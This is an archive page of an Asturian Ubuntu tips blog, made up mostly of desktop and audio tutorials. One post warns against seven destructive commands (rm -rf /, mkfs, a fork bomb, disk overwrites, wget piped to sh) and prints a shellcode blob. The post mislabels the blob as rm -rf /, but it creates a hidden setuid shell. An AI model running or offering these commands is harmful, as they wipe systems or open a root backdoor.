Archivu 29 de Payares de 2008

Dosbox

29 de Payares de 2008

Dosbox ye un emulador de dos. Con esti programa vamos poder usar aplicaciones que tengamos por casa de cuando usábemos esti sistema operativu.

Namás tenéis qu’instalalu dende la terminal con

sudo apt-get install dosbox

o al traviés del instalador de paquetes de synaptic

Agora vamos crear un directoriu col nome dosprog dientro de la nuestra carpeta personal, y copiamos ellí los programes que queremos usar.

Agora namás nos queda arrancar el programa, pa ello tecleamos dosbox nuna terminal.

Bienllegaos al DOS. Agora tenemos que dici-y al programa onde va tar el so discu, pa ello tecleamos

mount c ~/dosprog

onde ~ equival a /home/[nome usuariu]

Agora namás queda navegar hasta la carpeta que queramos y executar el ficheru en cuestión (acordáivos que los executables son los *.exe).

Dalgunos comandos que nos puen sirivir pal DOS:

dir: llista el directoriu, equival al ls de GNU/Linux.
cd [nome directoriu]: llévanos al directoriu escoyíu, igual qu’en GNU/Linux.
cd..: sube un directoriu, en GNU/Linux ye cd ...
cls: llimpia la pantalla, en GNU/Linux ye clear.

Pa salir del programa tenéis que teclear:

exit

Pa tener más información podéis teclear INTRO y el programa infórmavos de más opciones y posibilidaes.

Que lo paséis bien con esos xuegos abandonaes que tenéis per ehí.

¡Ubuntu ye perproductivu!

28 de Payares de 2008

Pa quien dulde de la potencia de Compiz, equí vos dexo un videu 😉 Y ye que nun ye sólo vistoso, tamién potente 😀

Ver el vídeu en Youtube

Poner un botón d’aniciu y personalizalu

27 de Payares de 2008

Güei vamos ver en Ta pa Ponga cómo amestar un Botón d’aniciu al panel y ponelu al gustu. Ye verdá que tenemos un menú igual na barra d’arriba, con tres seiciones, les famoses “Aplicaciones, Llugares, Sistema” pero ye que en Ta pa Ponga somos asina….

Esti botón qu’amestaremos, podemos ponelu tanto na barra superior como na inferior. Yo voi ponelu na d’abaxo y a manzorga. Au queremos llegar ye a esto:

Pa ello, calcamos nel panel inferior col botón drechu, seleicionamos Amestar al Panel…, y nel cuadru que se nos abre, escoyemos esta opción:

Decatáivos que ye Menu Principal, (y non Barra de Menu, que ye la de “Aplicaciones, Llugares, Sistema”)

Apareceravos ésto:

Na imaxe d’arriba yá vemos el nuevu menú. Hai que movelu a manzorga. Los elementos tan davezu “anclaos” al panel, y nun puen movese. Tenemos que desanclalos. Col botón drechu enriba de los elementos, seleicionamos “Anclar al Panel” y desmarcamos el caxellu. Púnxevos unos puntos bermeyos enriba de los elementos que hai. (El separtador ye tamién un elementu, y hai que desanclalu)

Una vegada fecho eso, movemos el nuevu botón de menú.

y anclamos otra vegada tolos elementos

Ya tenemos el nuesu botón de menú. Agora vamos a personalizalu. Podemos camuda-y l’aspeutu y poner por exemplu éstos:

Podeis poner cualesquier imaxe o logu, la vuesa cara, el escudu del vuesu equipu de ḥoquei xelu preferíu, lo que queráis, siempres que tea en formatu .png. Descargamos una imaxe de botón como les d’arriba, y metémosla nuna carpeta o direutoriu pa dempués.

Pa facelo, echaremos mano del Editor de Configuración. Vien desactiváu por defeutu.. asina que vamos a activalu: En Sistema–>Preferencies–>Menu Principal, calcáis en Ferramientes del Sistema (na ventana esquierda), y activáis el caxellu de Editor de configuración (ventana drecha) y llueu Zarrar.

Agora yá podemos alcontralu nel menú Aplicaciones—>Ferramientes del Sistema. Abrímoslu y vamos a /apps/panel/objects

Alcontraremos dellos object_0, object_1 , object_2… Fixarémonos namás nel que tenga na ventana drecha la variable object_type=menu-object. (Nel mio casu ye’l object_2, que na ventana de la drecha tien object_type=menu-object) Si por exemplu, trae: object_type=launcher-object, nun ye el que hai que camudar.

Yá vamos finando. Na ventana de la drecha vamos a les variables use_custom_icon, que conseñamos,

y la variable custom_icon au pondremos el camín au s’alcuentra el nuesu botón .png

Automáticamente yá adicamos los cambeos…. 😀

Llisto. Botón d’aniciu personalizáu. Saludos

Más d’Enrique Dans

26 de Payares de 2008

Y ye que nun me dexa indiferente en nengún de los sos excelentes post, que vos copio dende equí 🙂

¿Qué facer escontra la piratería? NADA

NADA. Contra la mal llamada “piratería” – no la que ocurre en las costas de Somalia, sino contra los pacíficos ciudadanos que hacen clic en un enlace – no hay que hacer absolutamente NADA.

Primero, porque hacer clic en un enlace o usar un programa de descarga es lo más natural del mundo en Internet. Está en su mismísimo diseño, en sus protocolos. Es inevitable, y cualquier intento de impedirlo fracasará como han fracasado hasta ahora. Perseguir lo que no puede ser perseguido es absurdo.

Segundo, porque no es malo. No es robar. No se puede comparar al robo de propiedad física, es una falacia conceptual que solo los más ignorantes se atreven a mantener. La difusión no perjudica a los artistas cuando se asume que el modelo de cobrar por copia ha desaparecido. No se puede aspirar a cobrar por algo, generar una copia, que ya no cuesta nada. Producir música no es gratis, copiarla sí. Por tanto, hay que generar valor de otra manera. Proteger el negocio de las copias es absurdo.

Tercero, porque generar valor de otra manera no es imposible. Tal vez no requiera las costosas y pesadas estructuras que determinadas empresas mantenían para ello y se vean obligados a aligerarlas, pero no es imposible. Quien genere recursos con la propiedad intelectual de otros debe pagar por ello. En el nuevo entorno existen infinitas maneras de generar valor y de hacer que alguien pague por tu producto, sin extorsionarlo mediante un injusto canon o gravarlo con un impuesto arbitrario. Subvencionar la ineficiencia es absurdo.

Cuarto, porque en una jerarquía de valores razonable, proteger la intimidad de los ciudadanos, el secreto de las comunicaciones o la libertad de expresión son cuestiones que siempre y en todo momento deberían estar por encima de la protección de la propiedad intelectual. Lo contrario es prevaricar, favorecer los intereses de una minoría en contra del interés general, y a medio plazo es absurdo.

Quinto, porque la cultura no se defiende restringiendo el acceso a ella, sino difundiéndola, permitiendo que sea compatible con la realidad de su entorno. La protección que entre insultos y malas maneras exigen determinados estamentos no es protección para la cultura, sino para una serie de modelos económicos inviables en el mundo actual. Defender a quien no merece ser defendido porque no añade valor alguno es absurdo.

Dejémonos de absurdos y de verdades a medias. Ni campañas de concienciación innecesarias y mentirosas, ni un FICOD convertido en escenario para que la mal llamada “industria cultural” acuda a insultar a los asistentes. La “piratería” no existe, y contra ella no hay que hacer NADA.

Gmail, avísame

25 de Payares de 2008

Pa tolos que tengáis una cuenta en Gmail, esiste una aplicación perprestosa que vos avisará con un ventanu emerxente cada vegada que recibáis un mail, ensin tener que tar tol día abriendo, zarrando y visitando la páxina web. Esta aplicación ye’l Gmail Notify.

Vamos instalala. Dende Aplicaciones–>Amestar/Quitar…
Na llista estenderexable de Amosar: seleicionamos Toles aplicaciones disponibles y en Restolar ponemos Gmail Notifiy

Calcamos nel caxellu de marcáu, y entrugarános ¿Permitir la instalación de software calteníu pola comunidá?, llueu Habilitar, Aplicar Cambeos… pediranos la nuesa contraseña… y a la fin tendrémoslu instaláu.

Agora vamos a configuralu. Pa ello… vamos a Aplicaciones–>Internet—>Gmail notify

y abrirásenos un cuadru de diálogu au enllenaremos los siguientes campos:

Los más importantes son usename, el_vuesu_nome@gmail.com ;password , la que tengáis y Browser path (ehí pondréis firefox, talo y como s’amuesa na semeya, o el nome del restolador web que teáis usando).

Los demás campos, podéis dexalos como tán, y nel caberu podemos escoyer ente les llingües English, Spanish, Svenska, ya Italianu. Calcamos nel caxellu de marcáu “Save username and password / Guardar nome d’usuariu y contraseña” y Aceutar

NOTA: Vamos ponelu n’asturianu. Pa ello, descargamos esti ficheru–> langs.xml y ponémoslu dientro de la carpeta: /usr/share/apps/gmail-notify    Alcordáivos de facelo con permisos de root. Zarráis el programa, y abríslu otra vegada

Apaecerávos l’iconu enriba al delláu del calendariu, calcamos col botón drechu del mur, vamos a Configurar, y agora tendréis: English, Asturianu, Svenska, ya Italianu . Escoyemos Asturianu y llisto!!

Calcando col botón drechu enriba del iconu, sálenvos les opciones “Revisar Agora“, por si sois impacientes o “Bandexa d’entrada“, pa dir direutamente ensin falta que nos lleguen mails 🙂 A esfrutar!!

P.D. Pa facer que s’execute Gmail Notify al entamu de cada sesión, tendremos de dir a Sistema—>Preferencies—>Sesiones ó Aplicaciones nel Aniciu (dependiendo la versión que tengas d’Ubuntu). Calcamos en Amestar, y nel cuadru ponemos Nome: Gmail Notify  ;  Comandu: /usr/bin/gmail-notify  ; Comentariu: lo que queráis. Guardamos y llisto. 🙂

Más y más radio

25 de Payares de 2008

Van yá perehí unos cuantos posts en Tapaponga que despliquen como configurar reproductores de música y delles de les aplicaciones que mos ufren. Una de les más guapes suel ser escuchar Emisores de Radio. Magar que tamién se desplica, voi ponevos equí una páxina web qu’enllenará les mañanes a más d’un… tamos falando de Shoutcast .

Pa ello vamos a usar el reproductor Rhythmbox, qu’arriendes de ser de la suite oficial d’Ubuntu, tenémoslu disponible n’asturianu.

Vamos a la so páxina web www.shoutcast.com y podemos da-y al restolador por xéneru de música o nome d’estación “Station / Genre”. Como a mi me va lo celta, voi conseñá-y qu’ande a la gueta d’estaciones de radio que tengan el xéneru “celtic“, talo y como s’amuesa na semeya

Yá taremos viendo les estaciones de radio. Entós vamos da-y pa que nos abra por exemplu la primera (liveIreland, Independent Irish and Celtic Music) calcamos en TUNE IN!

Agora, el restolador web que tengamos, nel mio casu Firefox, entrugaranos con qué queremos abrilo. Por defeutu, ponnos la opción de “Totem”. Esto nun ye lo que queremos. Queremos Rhythmbox, entós, calcamos na llista estenderexable de “Abrir con” y seleicionamos “otros…”

Vamos al camín de la carpeta /usr/bin y ehí escoyemos Rhythmbox

Calcamos n’Abrir. Y llueu clicamos nel caxellu de marcáu pa que’l Firefox nos faiga siempres lo mesmo.

Aceutamos, y abriráse’l nuesu reproductor. Vamos onde trai Radio, y facemos duble click na nuesa emisora (nesti casu saldránvos 4, eso ye porque tienen 4 señes IP pa coneutar). Facemos click nuna d’elles y llisto: Radio liveIreland from Dublin pa los vuesos oyíos. Ye hora de tomar una caña, meyor si ye Guinness 🙂

Una cosina: si nun oís la música (decatáivos que tarda unos segundinos n’atroxala nel buffer), seique vos falten los códecs, y tendréis qu’instalalos. Si vos pasa eso, y nun dais con ellos, entrugái dexando un comentariu. Saludos.

¡Cuidaín colo que executes!

24 de Payares de 2008

Voi ponevos 7 comandos que NUNCA debeis executar. De facelo desaniciaravos el sistema.
Pongovoslos ya que la conocencia da’l control 😉 y si dalguna vegada te roben el portátil y consigues acceder por ssh puedes desaniciar tolos documentos > : P

1. Esborra recursivamente tolos ficheros del direutoriu root.
rm -rf /

2. El comandu 1, escritu en hexadecimal ¡toma frikada! 😛
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

3. Formatea’l sistema de ficheros de /dev/sda (xeneralmente el nuestro discu duru).
mkfs.ext3 /dev/sda

4. Conocíu tamién como forkbomb, criará y executará un númberu pergrande de procesos fasta bloquiar el sistema.
:(){:|:&};:

5. Sobreescribe’l dispositivu (/dev/sda) cola salida del comandu executado, xeneralmente desaniciando’l conteníu autual del dispositivu y provocado la pérdida total de los datos.
cualisquier_comandu > /dev/sda

6. Baxará un ficheru executable o script y lo executará. Si’l sitiu nun ye de confianza podría ser códigu maliciosu.
wget http://alguna_url -O- | sh

7. Mueve toles carpetes del usuariu a /dev/null, oseayase, desaniciales toes.
mv /home/tu_usuario/* /dev/null

Opinión d’Enrique Dans: ¡Un 10!

23 de Payares de 2008

Nel artículu d’El Blog de Enrique Dans, atopo esta ayalga d’ente les munches qu’esti excelente blogger nos tien acostumbraos 😀 El conteníu y l’enfoque nun tienen pérdida 😀

Más pantalles de login

23 de Payares de 2008

Nun fae muncho vimos unes cuantes pantalles de login, y agora dende Paullinux atopamos unes cuantes tamién perprestoses 😉

Xestiona PulseAudio dende l’area d’iconificación

22 de Payares de 2008

Esti xestor entró n’Ubuntu 8.04, y aunque por defectu Ubuntu ta configuráu pal xestor ALSA, ye perfácil camudar dende’l menu Sistema / Preferencies / Soníu al PulseAudio 😉

Con ello faes, que PulseAudio xestione tolos soníos. Ye muncho más potente y avanzáu qu’ALSA, pero convien instalar un paquete pa poder tener tol poder dende l’area d’iconificación.

Dende la terminal:
sudo aptitude install pavucontrol

Reiniciamos, y executamos Aplicaciones / Soníu y Videu / PulseAudio Device Chooser y apareceranos nel area d’iconificación un jack col que podemos facer coses tan interesantes cómo baxar/xubir el volume a delles aplicaciones 😀

PD: Esti xestor entró n’Ubuntu 8.04, y recibió munches crítiques por dar problemes en dalgún hardware. D’hecho sigue siendo ALSA’l xestor por defectu na 9.04. Usa esti artículu con cuidáu y sabiendo lo que faes 😉